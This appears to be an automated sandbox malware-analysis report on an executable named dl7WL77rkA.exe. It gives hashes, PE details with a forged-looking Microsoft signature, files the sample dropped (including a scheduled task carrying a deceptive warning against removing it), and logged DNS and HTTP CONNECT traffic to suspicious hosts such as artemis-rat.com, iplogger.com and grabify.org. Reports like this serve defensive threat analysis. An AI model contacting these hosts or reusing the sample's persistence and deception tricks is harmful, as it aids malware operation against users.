                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|....p...............................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc........p......................@.0.........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Windows\Tasks\88e931437f4fbe2c.job

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\wfplwfs.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):496
                                                                                                                                                                                                                                                            Entropy (8bit):3.4531872142792017
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:kTXgG5ZsUEZ+lX1t5N6tO8G5ZsUEZ+lX1olKqYEp5txyk+SkE+MTBSclRMlTJzXn:c0Q1oQ1ol62CQ1BZ7MTLwtVVBgB
                                                                                                                                                                                                                                                            MD5:59037F47CF0D1A84F2FD380ED5A810AB
                                                                                                                                                                                                                                                            SHA1:196BEB8F985D8FC7E4D103E766126A839380D2CA
                                                                                                                                                                                                                                                            SHA-256:5ECB88011640D3B228CAFA4385217BADF9E9EE9862EC66EA3B1BCD706D0BBA6B
                                                                                                                                                                                                                                                            SHA-512:3C212502C1ABAEDEC81AB36547498799B3346B29EDBFF0C92A5ED4996BFB64AA5C01FC17FAA72541CC389ABA93AAE750757E7CFBA5BE7F9239B53C8A9E469734
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:....L.}.b.kE...Km..cF.......<... .....s.......... ..................../.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.w.f.p.l.w.f.s...e.x.e.....#.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.....A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...N.W.i.n.d.o.w.s. .F.o.u.n.d.a.t.i.o.n. .S.e.r.v.i.c.e.s.,. .B.a.n. .w.i.l.l. .c.a.u.s.e. .s.y.s.t.e.m. .c.r.a.s.h.,. .p.l.e.a.s.e. .k.e.e.p. .b.o.o.t.i.n.g.................0...............................................

                                                                                                                                                                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                                                                                                            Entropy (8bit):4.424455290206163
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:hSvfpi6ceLP/9skLmb0OTyWSPHaJG8nAgeMZMMhA2fX4WABlEnN20uhiTw:4vloTyW+EZMM6DFyY03w
                                                                                                                                                                                                                                                            MD5:95D2BDD15C877C953672DFED3AC808B3
                                                                                                                                                                                                                                                            SHA1:D5D8B6856B2AD7CBCF861DA6C1AEE190CA3B7ABC
                                                                                                                                                                                                                                                            SHA-256:B097791DB8A528B21B9ACB31349522C88D3CF00FDA7B939F60A4DDBD9EA62B04
                                                                                                                                                                                                                                                            SHA-512:3589A91F87F5330AC6D8F15728C0D365A9E199332915256009DB7DE3A35047F053C5AD1BE3357C5C1ECB1BF007DDB0B0C6FB92AB4197C59749849CCC1AA77933
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:regf>...=....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.C."\s..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve.LOG1

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1744896
                                                                                                                                                                                                                                                            Entropy (8bit):4.577484861512961
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:ASvfpi6ceLP/9skLmb0OTyWSPDaJG8nAgeMZMMhA2fX4WABlEnN20uhiTw:rvloTyWSEZMM6DFyY03w
                                                                                                                                                                                                                                                            MD5:BB3EE5066E43731038C3D26A390B6BE8
                                                                                                                                                                                                                                                            SHA1:8BA3C2ADDB2B3365E8BD7195BD9DC5A4F3FFC463
                                                                                                                                                                                                                                                            SHA-256:2D118B998A02931EBC2AC4DC1CA6A238E7F583537D6910E71C714203E2ADDA62
                                                                                                                                                                                                                                                            SHA-512:B636786C8BC5DD03D4DF35E9D5E4AA93C826432BA6CE55291D08718AB379DF5A8B81CA8D35B300832108639DBAF8BD6F7648979AD08C13A6977B45E3B9920913
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:regf=...=....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.C."\s..................................................................................................................................................................................................................................................................................................................................................HvLE........=............hp....U...q.........0...@...`..hbin.................\.Z............nk,..\.Z........P ..........h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........V...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t.......vk..<...............

                                                                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                            Entropy (8bit):6.544682159484808
                                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                                            • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                                                                                                                                                                                                            • Win64 Executable GUI (202006/5) 46.43%
                                                                                                                                                                                                                                                            • Win64 Executable (generic) (12005/4) 2.76%
                                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.46%
                                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.46%
                                                                                                                                                                                                                                                            File name:dl7WL77rkA.exe
                                                                                                                                                                                                                                                            File size:48'352 bytes
                                                                                                                                                                                                                                                            MD5:f1e075f8cebe5aaca53ed7c158d81cbd
                                                                                                                                                                                                                                                            SHA1:11f80b386b8a04a4f82d065cefb634bb389e9dbd
                                                                                                                                                                                                                                                            SHA256:39245735a6a4d2495cb6a5207bb9d5e2b6c058d113b6b0efc292330a89611757
                                                                                                                                                                                                                                                            SHA512:12b1d894dd8fd2e9c595458a9b4b7098821a642fdc27c6044b84c8c26784ca161957a7b1f934a7253be9737af031bfa15f7436d0776126eec608131924cba192
                                                                                                                                                                                                                                                            SSDEEP:768:7w5fIJQ5UMuXyicwVI7b8kgUUL8L/aUW/seidZhPlqEFiRT:sVp5UMuXy9wowR8tR/lqeip
                                                                                                                                                                                                                                                            TLSH:8F237D21FA5C1227DABF01B98CA150C17B30E34277D1EBA99CD661865AC37C13BB1E5E
                                                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....X............"...0.x................ ....@...... ....................................`................................

                                                                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                                                                            Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Entrypoint:0x400000
                                                                                                                                                                                                                                                            Entrypoint Section:
                                                                                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                            Time Stamp:0xC398581B [Tue Dec 26 19:12:27 2073 UTC]
                                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                                            File Version Major:4
                                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                                            Import Hash:

                                                                                                                                                                                                                                                            Authenticode Signature

                                                                                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                                                                                            Signature Issuer:C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                                                                                                                                                                                                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                                                                                            Error Number:-2146762487
                                                                                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                                                                                            • 08/03/2024 02:38:17 08/03/2025 02:38:17
                                                                                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                                                                                            • C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                                                                                                                                                                                                                                            Version:3
                                                                                                                                                                                                                                                            Thumbprint MD5:6011432F6209C03D1EC27DAD76E9D5E9
                                                                                                                                                                                                                                                            Thumbprint SHA-1:680E4ED67D6A411B916E77D959D2EAC7710427C9
                                                                                                                                                                                                                                                            Thumbprint SHA-256:807B8C02E81DAE7F40506B82C8C95EDCA62AF8AF571C590A760AB09622744C6C
                                                                                                                                                                                                                                                            Serial:2B17B3DF3894BC5540E9E13DA78BBB40

                                                                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                                            dec ebp
                                                                                                                                                                                                                                                            pop edx
                                                                                                                                                                                                                                                            nop
                                                                                                                                                                                                                                                            add byte ptr [ebx], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax+eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al

                                                                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x5d6.rsrc
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xa4000x18e0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xb9b80x38.text
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                            Sections

                                                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                            .text0x20000x9a780x9c00c06507664f6fdc73197ad2d8aa61a1e1False0.5942007211538461data6.336720567337779IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                            .rsrc0xc0000x5d60x600f1ee9f02a5cb6e37adf0d993ee3f387bFalse0.4186197916666667data4.124252649326652IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                            Resources

                                                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                            RT_VERSION0xc0a00x34cdata0.4099526066350711
                                                                                                                                                                                                                                                            RT_MANIFEST0xc3ec0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:34.791852951 CET192.168.2.51.1.1.10x8a87Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.411597013 CET192.168.2.51.1.1.10xc5deStandard query (0)ktxcomay.com.vnA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.843635082 CET192.168.2.51.1.1.10x9b66Standard query (0)artemis-rat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.218596935 CET192.168.2.51.1.1.10xa1a3Standard query (0)yip.suA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.219515085 CET192.168.2.51.1.1.10x70d9Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.792306900 CET192.168.2.51.1.1.10x4118Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.844377041 CET192.168.2.51.1.1.10x9b73Standard query (0)shipofdestiny.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.849052906 CET192.168.2.51.1.1.10x45a0Standard query (0)sty.inkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.854512930 CET192.168.2.51.1.1.10xed98Standard query (0)namemail.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.859807968 CET192.168.2.51.1.1.10xa014Standard query (0)net.geo.opera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.076706886 CET192.168.2.51.1.1.10x9221Standard query (0)iplogger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.081505060 CET192.168.2.51.1.1.10xc559Standard query (0)ittrade.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.098566055 CET192.168.2.51.1.1.10x30d4Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.504236937 CET192.168.2.51.1.1.10xf4c4Standard query (0)lawyerbuyer.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.934679031 CET192.168.2.51.1.1.10x2609Standard query (0)grabify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.327290058 CET192.168.2.51.1.1.10x5392Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:34.947017908 CET1.1.1.1192.168.2.50x8a87No error (0)github.com140.82.112.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.174540043 CET1.1.1.1192.168.2.50xc5deNo error (0)ktxcomay.com.vn222.255.238.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.090693951 CET1.1.1.1192.168.2.50x9b66No error (0)artemis-rat.com104.21.54.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.090693951 CET1.1.1.1192.168.2.50x9b66No error (0)artemis-rat.com172.67.140.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.374389887 CET1.1.1.1192.168.2.50x70d9No error (0)pastebin.com104.20.68.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.374389887 CET1.1.1.1192.168.2.50x70d9No error (0)pastebin.com172.67.34.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.374389887 CET1.1.1.1192.168.2.50x70d9No error (0)pastebin.com104.20.67.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.730093956 CET1.1.1.1192.168.2.50xa1a3No error (0)yip.su172.67.169.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.730093956 CET1.1.1.1192.168.2.50xa1a3No error (0)yip.su104.21.79.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.947572947 CET1.1.1.1192.168.2.50x4118No error (0)bitbucket.org104.192.141.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.020378113 CET1.1.1.1192.168.2.50x45a0No error (0)sty.ink172.67.200.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.020378113 CET1.1.1.1192.168.2.50x45a0No error (0)sty.ink104.21.13.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.029437065 CET1.1.1.1192.168.2.50x9b73No error (0)shipofdestiny.com104.21.32.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.029437065 CET1.1.1.1192.168.2.50x9b73No error (0)shipofdestiny.com172.67.152.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.107320070 CET1.1.1.1192.168.2.50xed98No error (0)namemail.org172.67.178.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.107320070 CET1.1.1.1192.168.2.50xed98No error (0)namemail.org104.21.83.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.234003067 CET1.1.1.1192.168.2.50x9221No error (0)iplogger.com172.67.188.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.234003067 CET1.1.1.1192.168.2.50x9221No error (0)iplogger.com104.21.76.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.512200117 CET1.1.1.1192.168.2.50xa014No error (0)net.geo.opera.comus.net.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.512200117 CET1.1.1.1192.168.2.50xa014No error (0)us.net.opera.comlati.lb.opera.technologyCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.512200117 CET1.1.1.1192.168.2.50xa014No error (0)lati.lb.opera.technology107.167.110.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.512200117 CET1.1.1.1192.168.2.50xa014No error (0)lati.lb.opera.technology107.167.110.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.267923117 CET1.1.1.1192.168.2.50x30d4No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.267923117 CET1.1.1.1192.168.2.50x30d4No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.267923117 CET1.1.1.1192.168.2.50x30d4No error (0)s3-w.us-east-1.amazonaws.com52.217.234.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.267923117 CET1.1.1.1192.168.2.50x30d4No error (0)s3-w.us-east-1.amazonaws.com54.231.169.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.267923117 CET1.1.1.1192.168.2.50x30d4No error (0)s3-w.us-east-1.amazonaws.com3.5.29.28A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.267923117 CET1.1.1.1192.168.2.50x30d4No error (0)s3-w.us-east-1.amazonaws.com3.5.11.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.267923117 CET1.1.1.1192.168.2.50x30d4No error (0)s3-w.us-east-1.amazonaws.com52.216.179.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.267923117 CET1.1.1.1192.168.2.50x30d4No error (0)s3-w.us-east-1.amazonaws.com3.5.7.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.267923117 CET1.1.1.1192.168.2.50x30d4No error (0)s3-w.us-east-1.amazonaws.com52.216.145.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.267923117 CET1.1.1.1192.168.2.50x30d4No error (0)s3-w.us-east-1.amazonaws.com54.231.195.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.337651014 CET1.1.1.1192.168.2.50xc559No error (0)ittrade.org172.67.177.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.337651014 CET1.1.1.1192.168.2.50xc559No error (0)ittrade.org104.21.59.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.785830021 CET1.1.1.1192.168.2.50xf4c4No error (0)lawyerbuyer.org104.21.63.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.785830021 CET1.1.1.1192.168.2.50xf4c4No error (0)lawyerbuyer.org172.67.170.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.213479996 CET1.1.1.1192.168.2.50x2609No error (0)grabify.org172.67.168.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.213479996 CET1.1.1.1192.168.2.50x2609No error (0)grabify.org104.21.94.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.503660917 CET1.1.1.1192.168.2.50x5392No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.503660917 CET1.1.1.1192.168.2.50x5392No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.503660917 CET1.1.1.1192.168.2.50x5392No error (0)s3-w.us-east-1.amazonaws.com3.5.20.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.503660917 CET1.1.1.1192.168.2.50x5392No error (0)s3-w.us-east-1.amazonaws.com16.182.73.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.503660917 CET1.1.1.1192.168.2.50x5392No error (0)s3-w.us-east-1.amazonaws.com3.5.17.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.503660917 CET1.1.1.1192.168.2.50x5392No error (0)s3-w.us-east-1.amazonaws.com54.231.171.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.503660917 CET1.1.1.1192.168.2.50x5392No error (0)s3-w.us-east-1.amazonaws.com54.231.170.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.503660917 CET1.1.1.1192.168.2.50x5392No error (0)s3-w.us-east-1.amazonaws.com52.216.178.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.503660917 CET1.1.1.1192.168.2.50x5392No error (0)s3-w.us-east-1.amazonaws.com54.231.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.503660917 CET1.1.1.1192.168.2.50x5392No error (0)s3-w.us-east-1.amazonaws.com52.217.41.220A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            0192.168.2.549730211.234.125.54433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.024704933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1192.168.2.549741211.234.125.54433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.046173096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2192.168.2.549750211.234.125.54433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.062390089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            3192.168.2.549753211.234.125.54433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.065145016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            4192.168.2.549721104.16.25.216803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.162008047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
